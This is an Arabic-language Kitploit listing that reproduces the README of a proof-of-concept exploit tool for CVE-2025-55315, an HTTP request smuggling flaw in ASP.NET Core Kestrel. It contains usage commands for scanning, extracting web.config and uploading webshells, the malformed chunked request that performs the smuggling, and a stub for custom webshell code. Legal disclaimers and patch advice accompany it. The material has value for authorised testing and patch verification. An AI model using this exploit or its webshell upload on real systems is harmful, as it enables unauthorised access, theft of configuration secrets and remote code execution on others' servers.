Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-55315-PoC-Exploit — CVE-2025-55315 PoC Exploit | Kitploit
أدوات/GitHubGitHub/zemarkhos/cve-2025-55315-poc-exploit
ماسحات الثغرات الأمنيةتوليد الحمولةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubzemarkhos/cve-2025-55315-poc-exploit

CVE-2025-55315-PoC-Exploit

CVE-2025-55315 PoC Exploit

عرض المستودع
853منذ 10 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

أداة اختبار الاختراق CVE-2025-55315

أداة استغلال تهريب طلبات HTTP لـ ASP.NET Core Kestrel

Python Version CVE CVSS License


⚠️ تحذير قانوني

هذه الأداة مخصصة لاختبارات الأمان المصرح بها فقط!

  • استخدم فقط على الأنظمة التي تملكها أو لديك إذن كتابي صريح لاختبارها
  • الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني
  • منشئ الأداة ليس مسؤولاً عن سوء الاستخدام
  • باستخدام هذه الأداة، فإنك تتحمل المسؤولية القانونية الكاملة

📋 نظرة عامة

أداة اختبار اختراق احترافية لـ CVE-2025-55315 (ثغرة تهريب طلبات HTTP في خادم ASP.NET Core Kestrel). صُممت هذه الأداة لتحليل هدف واحد مع إمكانيات استغلال شاملة.

ما هي CVE-2025-55315؟

ثغرة حرجة لتهريب طلبات HTTP في خادم الويب ASP.NET Core Kestrel (CVSS 9.9/10) تسمح للمهاجمين بـ:

  • تجاوز المصادقة
  • سرقة بيانات الاعتماد ورمز الجلسة
  • تنفيذ تزوير الطلبات من جانب الخادم (SSRF)
  • تسميم ذاكرة التخزين المؤقت
  • تحميل أوامر الويب والحصول على تنفيذ تعليمات برمجية عن بُعد

الإصدارات المتأثرة:

  • .NET Core 3.0 حتى .NET 9.0.9
  • تم الإصلاح في: .NET 8.0.21+، 9.0.10+، 10.0.0-rc2+

✨ الميزات

القدرات الأساسية

  • ✅ تحليل هدف واحد - اختبار اختراق مركّز على هدف محدد
  • ✅ اكتشاف تلقائي للنقاط النهائية - يكتشف نقاط النهاية الشائعة في ASP.NET Core
  • ✅ اختبار يدوي للنقاط النهائية - اختبار نقاط نهاية محددة محل الاهتمام
  • ✅ كشف الثغرات - كشف دقيق لـ CVE-2025-55315
  • ✅ استخراج web.config - قراءة ملفات التهيئة عبر تهريب الطلبات
  • ✅ تحميل أوامر الويب - إمكانية نشر أوامر الويب اختيارياً
  • ✅ إعداد تقارير مفصلة - تقارير بتنسيق JSON ونصي
  • ✅ ميزات الأمان - مطالبات تأكيد متعددة للإجراءات الضارة

الميزات التقنية

  • دعم HTTP/1.1 و HTTPS
  • دعم المنافذ المخصصة
  • مهلات قابلة للتكوين
  • وضع تصحيح مطوّل (verbose)
  • مخرجات طرفية ملونة
  • تجاوز التحقق من شهادة SSL (للاختبار)

🔧 التثبيت

المتطلبات

root@kitploit:~
# Python 3.7 أو أعلى
python3 --version

# لا تبعيات خارجية - يستخدم المكتبة القياسية فقط

التحميل

root@kitploit:~
# استنساخ أو تحميل الأداة
git clone https://github.com/ZemarKhos/CVE-2025-55315-PoC-Exploit.git
cd CVE-2025-55315-PoC-Exploit

# جعلها قابلة للتنفيذ
chmod +x cve_2025_55315_PoC.py

🚀 بداية سريعة

فحص الثغرات الأساسي

root@kitploit:~
python3 cve_2025_55315_PoC.py -t target.com

سيؤدي هذا إلى:

  1. جمع معلومات الخادم
  2. اكتشاف النقاط النهائية النشطة تلقائياً
  3. اختبار كل نقطة نهاية بحثاً عن CVE-2025-55315
  4. عرض النتائج في الطرفية

اختبار نقطة نهاية محددة

root@kitploit:~
python3 cve_2025_55315_PoC.py -t target.com -e /api/login

فحص كامل مع استخراج web.config

root@kitploit:~
python3 cve_2025_55315_PoC.py -t target.com --read-config -o report.txt

متقدم: استغلال كامل (مصرح به فقط!)

root@kitploit:~
python3 cve_2025_55315_PoC.py \
  -t target.com \
  --read-config \
  --upload-shell \
  -v \
  -o full_report.txt

📖 أمثلة الاستخدام

المثال 1: فحص سريع

السيناريو: التحقق مما إذا كان خادم الإنتاج معرضاً للثغرة

root@kitploit:~
python3 cve_2025_55315_PoC.py -t api.mycompany.com

المدة المتوقعة: 30-60 ثانية


المثال 2: فحص مفصل

السيناريو: فحص شامل للنقاط النهائية مع مخرجات مطولة

root@kitploit:~
python3 cve_2025_55315_PoC.py -t api.mycompany.com -v -o scan_results.txt

المدة المتوقعة: 2-5 دقائق


المثال 3: استهداف نقاط نهاية متعددة

السيناريو: اختبار نقاط نهاية حرجة محددة

root@kitploit:~
python3 cve_2025_55315_PoC.py \
  -t api.mycompany.com \
  -e /api/payment/process \
  -e /api/admin/users \
  -e /api/internal/config \
  -o critical_endpoints.txt

المثال 4: هدف بدون SSL

السيناريو: اختبار خادم HTTP داخلي

root@kitploit:~
python3 cve_2025_55315_PoC.py \
  -t internal-api.local \
  -p 8080 \
  --no-ssl

📊 خيارات سطر الأوامر

root@kitploit:~
usage: cve_2025_55315_PoC.py [-h] -t TARGET [-p PORT] [-e ENDPOINT]
                                  [--no-ssl] [--read-config] [--upload-shell]
                                  [-o OUTPUT] [-v] [--timeout TIMEOUT]

وسائط إلزامية:
  -t, --target         اسم المضيف الهدف أو URL (مثال: target.com)

وسائط اختيارية:
  -p, --port           رقم المنفذ (الافتراضي: 443 لـ SSL، 80 لغير SSL)
  -e, --endpoint       نقطة نهاية محددة لاختبارها (يمكن استخدامها عدة مرات)
  --no-ssl             تعطيل SSL/HTTPS (استخدام HTTP)
  --read-config        محاولة قراءة ملف web.config
  --upload-shell       محاولة تحميل أوامر الويب (يتطلب تأكيداً)
  -o, --output         حفظ التقرير في ملف
  -v, --verbose        تمكين المخرجات المطولة
  --timeout            مهلة المقبس بالثواني (الافتراضي: 10)
  -h, --help           عرض رسالة المساعدة

🔍 فهم المخرجات

مثال نظام معرض للثغرة

root@kitploit:~
Target: old-api.company.com:443
Vulnerable: YES - CRITICAL

--- معلومات الخادم ---
  server: Kestrel/8.0.15
  kestrel_detected: True
  http_version: 1.1

--- النقاط النهائية المعرضة (2) ---
  ✗ /api/login
    التفاصيل: نجاح تهريب الطلبات - استجابات متعددة
  ✗ /api/health
    التفاصيل: نجاح تهريب الطلبات - استجابات متعددة

--- الاستغلالات الناجحة ---
  ✓ web.config_read عبر /api/login

التفسير:

  • 🔴 تم اكتشاف ثغرة حرجة
  • 🔴 نقاط نهاية متعددة معرضة
  • 🔴 تم استخراج ملف التهيئة بنجاح
  • ⚡ عاجل: التحديث إلى .NET 8.0.21+ أو 9.0.10+

مثال نظام آمن

root@kitploit:~
Target: new-api.company.com:443
Vulnerable: NO - SECURE

--- معلومات الخادم ---
  server: Kestrel/9.0.10
  kestrel_detected: True
  http_version: 1.1

[SUCCESS] ✓ نقطة النهاية ليست معرضة (400 Bad Request)

✓ لم يتم العثور على نقاط نهاية معرضة - ربما تم تصحيح الهدف

التفسير:

  • ✅ النظام آمن
  • ✅ يعمل بإصدار Kestrel مصحح
  • ✅ تم رفض جميع الطلبات غير الصالحة

🛡️ الأمان والأخلاقيات

قائمة التحقق من التصريح

قبل تشغيل هذه الأداة، تأكد من:

  • أنك تملك النظام المستهدف، أو
  • لديك تصريح كتابي للاختبار، و
  • تم إخطار فريق الأمان، و
  • لديك خطة للتراجع، و
  • أنك تفهم الآثار القانونية

ميزات الأمان المدمجة

  1. تأكيد من مرحلتين - تطلب الأداة التصريح قبل البدء
  2. تأكيد تحميل أوامر الويب - يتطلب كتابة "YES" بالأحرف الكبيرة
  3. تحديد المعدل - تأخيرات بين الطلبات أثناء الاكتشاف التلقائي
  4. حماية المهلة - يمنع الاتصالات المعلقة
  5. تسجيل مفصل - يتم تسجيل جميع الإجراءات لمسار التدقيق

🔬 التفاصيل التقنية

تقنية الاستغلال

تستغل الأداة CVE-2025-55315 باستخدام ترميز نقل مجزأ (chunked) غير صالح:

root@kitploit:~
POST /endpoint HTTP/1.1
Host: target.com
Transfer-Encoding: chunked

2;\n          ← الثغرة: \n منفرد بدلاً من \r\n
XX
0\r\n
\r\n
GET /smuggled HTTP/1.1    ← يصبح هذا طلباً منفصلاً
Host: target.com

لماذا يعمل هذا:

  1. خادم الوكيل يرى \n كمحدد سطر → يعالج كطلب واحد
  2. Kestrel (الضعيف) يتجاهل \n → يعامل الطلب المهرب كطلب منفصل
  3. قد يتم تنفيذ الطلب المهرب في سياق جلسة مستخدم آخر

منطق الكشف

استجابة الخادمالتفسيرالحالة
400 Bad Requestرفض Kestrel للكتلة غير الصالحة✅ آمن (مصحح)
استجابات HTTP/1.1 متعددةتلقي استجابتين منفصلتين❌ معرض
500 أو 502خطأ خادم داخلي⚠️ يحتمل أن يكون معرضاً
200 OK عاديتم قبول الطلب⚠️ غير حاسم

🐛 استكشاف الأخطاء وإصلاحها

فشل الاتصال

root@kitploit:~
[ERROR] Connection failed: [Errno 111] Connection refused

الحلول:

  • تحقق من إمكانية الوصول إلى الهدف: ping target.com
  • تحقق من صحة رقم المنفذ
  • جرب مع/بدون SSL: --no-ssl
  • تحقق من قواعد جدار الحماية

خطأ شهادة SSL

root@kitploit:~
[ERROR] Connection failed: certificate verify failed

الحل: الأداة تقوم بالفعل بتعطيل التحقق من الشهادة. إذا استمرت المشكلة:

root@kitploit:~
export PYTHONHTTPSVERIFY=0
python3 cve_2025_55315_PoC.py -t target.com

أخطاء المهلة

root@kitploit:~
[WARNING] No response - possible timeout

الحلول:

  • زيادة المهلة: --timeout 30
  • تحقق من اتصال الشبكة
  • قد يكون الهدف بطيئاً أو محملاً بشكل زائد

تحميل محظور

root@kitploit:~
[WARNING] Upload blocked (forbidden/method not allowed)

التفسير:

  • تكوين الخادم يمنع طرق PUT/POST
  • جدار حماية تطبيقات الويب (WAF) / نظام منع الاختراق (IPS) يمنع التحميل
  • أذونات الملف تمنع الكتابة

هذا أمر طبيعي - ليست كل الأنظمة المعرضة تسمح بتحميل الملفات.


📚 المراجع

مصادر CVE-2025-55315

  1. نشرة أمان مايكروسوفت: https://github.com/dotnet/aspnetcore/issues/64033

  2. قاعدة بيانات NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-55315

  3. بحث Praetorian (مكافأة 10 آلاف دولار): https://www.praetorian.com/blog/how-i-found-the-worst-asp-net-vulnerability-a-10k-bug-cve-2025-55315/

  4. التحليل الفني لأندرو لوك: https://andrewlock.net/understanding-the-worst-dotnet-vulnerability-request-smuggling-and-cve-2025-55315/

تهريب طلبات HTTP

  1. بحث PortSwigger: https://portswigger.net/web-security/request-smuggling

  2. OWASP: https://owasp.org/www-community/attacks/HTTP_Request_Smuggling


🔄 التخصيص

إضافة نقاط نهاية مخصصة

قم بتعديل COMMON_ENDPOINTS في السكريبت:

root@kitploit:~
COMMON_ENDPOINTS = [
    '/your/custom/endpoint',
    '/api/myapp/admin',
    # أضف نقاط النهاية هنا
]

استخدام أوامر ويب مخصصة

قم بتعديل طريقة upload_webshell():

root@kitploit:~
def upload_webshell(self, endpoint: str = '/', shell_path: str = '/shell.aspx',
                   shell_content: str = None):
    if not shell_content:
        shell_content = '''
        <!-- أوامر ويب ASPX مخصصة هنا -->
        '''

📝 الإبلاغ عن المشكلات

إذا وجدت أخطاء أو لديك اقتراحات:

  1. شغّل مع وضع المخرجات المطولة: -v
  2. احفظ المخرجات الكاملة: -o debug.txt
  3. أدرج:
    • إصدار Python
    • الأمر المستخدم
    • رسالة الخطأ
    • السلوك المتوقع مقابل الفعلي

⚖️ إخلاء المسؤولية القانوني

root@kitploit:~
هذه الأداة متوفرة "كما هي" لأغراض تعليمية واختبارات الأمان المصرح بها فقط.

المؤلف (المؤلفون):
❌ لا يؤيدون الأنشطة غير القانونية
❌ ليسوا مسؤولين عن سوء الاستخدام
❌ ليسوا مسؤولين عن أي أضرار
❌ لا يقدمون استشارات قانونية

باستخدام هذه الأداة توافق:
✅ على الاستخدام فقط على الأنظمة المصرح بها
✅ على تحمل المسؤولية القانونية الكاملة
✅ على الامتثال لجميع القوانين المعمول بها
✅ على اتباع مبادئ الاختراق الأخلاقي

الاستخدام غير المصرح به ممنوع تماماً وغير قانوني!

🎓 الغرض التعليمي

تم إنشاء هذه الأداة من أجل:

  • باحثو الأمان
  • مختبرو الاختراق
  • صائدو مكافآت الثغرات
  • مسؤولو الأنظمة
  • التدريب على الوعي الأمني
  • تقييمات الأمان المصرح بها

ليست من أجل:

  • الهجمات الضارة
  • الوصول غير المصرح به
  • الاستطلاع التنافسي
  • أي أنشطة غير قانونية

🙏 شكر وتقدير

  • مركز استجابة أمان مايكروسوفت - للإفصاح عن CVE والتصحيحات
  • أمن Praetorian - للبحث الأصلي عن الثغرة
  • أندرو لوك - للتحليل الفني المفصل
  • مجتمع الأمان - لممارسات الإفصاح المسؤول

📄 الترخيص

للاستخدام التعليمي واختبارات الأمان المصرح بها فقط

هذه الأداة متوفرة للأغراض التعليمية واختبارات الأمان المصرح بها. الاستخدام التجاري أو إعادة التوزيع أو الاستخدام لأغراض ضارة محظور تماماً.


🔐 التحذير النهائي

root@kitploit:~
╔═════════════════════════════════════════════════════════════╗
║                                                             ║
║  استخدم هذه الأداة بمسؤولية وقانونية!                        ║
║                                                             ║
║  الوصول غير المصرح به إلى أنظمة الكمبيوتر جريمة.            ║
║  احصل دائماً على إذن كتابي قبل الاختبار.                     ║
║  اتبع ممارسات الإفصاح المسؤول.                              ║
║                                                             ║
║  اختراق سعيد (وقانوني)!                                     ║
║                                                             ║
╚═════════════════════════════════════════════════════════════╝

تنزيل الأداة